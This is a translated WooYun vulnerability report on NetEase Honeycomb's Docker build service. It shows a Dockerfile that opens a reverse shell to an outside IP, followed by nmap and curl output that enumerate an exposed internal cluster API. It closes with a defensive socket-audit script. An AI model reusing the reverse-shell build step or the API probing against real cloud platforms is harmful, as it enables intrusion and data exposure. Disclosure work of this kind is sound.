
Vulnerability summary

Defect ID: wooyun-2016-0168160

Title: Public cloud security: a design flaw in the NetEase Honeycomb (网易蜂巢) Docker cloud service leaks some internal APIs

Affected vendor: NetEase (网易)

Author: boooooom

Submitted: 2016-01-07 21:03

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-01-07: details sent to the vendor, awaiting vendor handling
2016-01-11: vendor confirmed; details disclosed to the vendor only
2016-01-21: details disclosed to core white hats and experts in the relevant field
2016-01-31: details disclosed to regular white hats
2016-02-10: details disclosed to intern white hats
2016-02-22: details disclosed to the public

Brief description:

NetEase Honeycomb is pretty nice, so let me test it for you; my account is already 0.5 yuan in arrears from the testing. It does look quite easy to use.
It is billed as a Docker-based container cloud built for developers, all-SSD backed for building cloud applications at top speed!

Detailed description:

1. Image creation supports building from a Dockerfile:
https://c.163.com/dashboard#/m/repo/create/
As we know, a Dockerfile can execute arbitrary commands during the build.
2. Executing arbitrary commands during the Dockerfile build yields a shell on the build host:

# Memcached
#
# VERSION 2.2
# use the ubuntu base image provided by dotCloud
FROM ubuntu
MAINTAINER Victor Coisne [email protected]
RUN sleep 1
RUN cat /etc/passwd
# make sure the package repository is up to date
RUN echo "deb http://mirrors.163.com/ubuntu/ precise main restricted universe multiverse" > /etc/apt/sources.list
RUN apt-get update
RUN echo "while ((1));do sleep 1;echo 111;/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1;done" >> /tmp/1.sh
RUN bash /tmp/1.sh
RUN sleep 20
# install memcached
RUN apt-get install -y memcached
# Launch memcached when launching the container
ENTRYPOINT ["memcached"]
# run memcached as the daemon user
USER daemon
# expose memcached port
EXPOSE 11211


3. Through the reverse shell I obtained access to one of the build servers, then probed the 172 network range and found:

172.17.42.1
Starting Nmap 5.21 ( http://nmap.org ) at 2016-01-07 15:36 UTC
Nmap scan report for 172.17.42.1
Host is up (0.000013s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
443/tcp open https
1046/tcp open unknown
6000/tcp open X11
7001/tcp open afs3-callback
8010/tcp open xmpp
8011/tcp open unknown
8081/tcp open blackice-icecap
8181/tcp open unknown
9091/tcp open unknown


Analysis shows that 172.17.42.1 serves Honeycomb's official website, and 172.17.42.1:8081 is an internal API:

# curl 172.17.42.1:8081
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 202 100 202 0 0 211k 0 --:--:-- --:--:-- --:--:-- 197k
{
"paths": [
"/api",
"/api/v1",
"/healthz",
"/healthz/ping",
"/logs/",
"/metrics",
"/resetMetrics",
"/swagger-ui/",
"/swaggerapi/",
"/ui/",
"/version"
]
}#


This endpoint exposes information on roughly 1522 uids:

# curl 172.17.42.1:8081/api/v1/namespaces|grep uid|sort|uniq |wc -l
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 793k 0 793k 0 0 6053k 0 --:--:-- --:--:-- --:--:-- 6100k
1522


# curl 172.17.42.1:8081/api/v1/namespaces
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0{
"kind": "NamespaceList",
"apiVersion": "v1",
"metadata": {
"selfLink": "/api/v1/namespaces",
"resourceVersion": "135465264"
},
"items": [
{
"metadata": {
"name": "0007c326cb3241ad8046f332d49f8994",
"selfLink": "/api/v1/namespaces/0007c326cb3241ad8046f332d49f8994",
"uid": "a693f499-b41a-11e5-a8e3-ecf4bbd96674",
"resourceVersion": "127645252",
"creationTimestamp": "2016-01-06T02:10:26Z",
"labels": {
"name": "0007c326cb3241ad8046f332d49f8994"
}
},
"spec": {
"finalizers": [
"kubernetes"
]
},


The other endpoints were not tested in detail.

Proof of vulnerability:

[Screenshot: c.163.1.png]

[Screenshot: c.163.4.png]

Fix recommendation:

The platform's own service APIs must be isolated from user environments.
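One way for a platform operator to verify that isolation on a build host, as an added example that is not part of the report or of NetEase's own tooling: audit the host's listening sockets and flag every service bound to a wildcard address or to the docker0 gateway (172.17.42.1 in the report), since those are reachable from every user build container on that bridge, exactly as the API on 8081 was. The `ss -lnt` output below is a constructed sample, and the address/port pairs other than 172.17.42.1:8081 are assumed for illustration.

```python
import ipaddress
import re

# Constructed sample of `ss -lnt` output on a build host (not taken from the report).
# 8081 on a wildcard bind reproduces the exposure the report found; 6443 on loopback
# and 8010 on a management-network address are the hardened alternatives.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    *:8081              *:*
LISTEN 0      128    127.0.0.1:6443      *:*
LISTEN 0      128    172.17.42.1:9091    *:*
LISTEN 0      128    10.0.0.5:8010       *:*
LISTEN 0      128    :::80               :::*
"""

# docker0 gateway address observed in the report
DOCKER_BRIDGE_GATEWAY = ipaddress.ip_address("172.17.42.1")

WILDCARDS = {"*", "0.0.0.0", "::", "[::]"}
LINE_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+$")


def parse_listeners(ss_output):
    """Yield (bind_address, port) for every LISTEN line of `ss -lnt` output."""
    for line in ss_output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2))


def reachable_from_containers(bind_address, gateway=DOCKER_BRIDGE_GATEWAY):
    """True if a socket bound to bind_address answers on the docker bridge.

    Wildcard binds and binds on the bridge gateway itself are reachable from
    every container on that bridge; loopback and other interface addresses
    are not (unless something proxies them, which this check cannot see).
    """
    if bind_address in WILDCARDS:
        return True
    try:
        return ipaddress.ip_address(bind_address.strip("[]")) == gateway
    except ValueError:
        return False


def audit(ss_output, gateway=DOCKER_BRIDGE_GATEWAY):
    """Return sorted (port, bind_address) pairs that user build containers can reach."""
    return sorted((port, addr) for addr, port in parse_listeners(ss_output)
                  if reachable_from_containers(addr, gateway))
```

Run `audit(SAMPLE_SS)` on the sample and ports 80, 8081 and 9091 are flagged; the loopback-bound 6443 and the 10.0.0.5-bound 8010 are not, which is the binding pattern the fix recommendation calls for. A firewall rule dropping traffic from the bridge to host-local ports is the second half of the isolation and is not covered by this socket-level check.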

Copyright notice: please credit boooooom@WooYun when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-01-11 09:59

Vendor reply:

The vulnerability has been submitted for remediation; the white hat's description of the exploitation is clear. Thank you for your support of NetEase!

Latest status:

None yet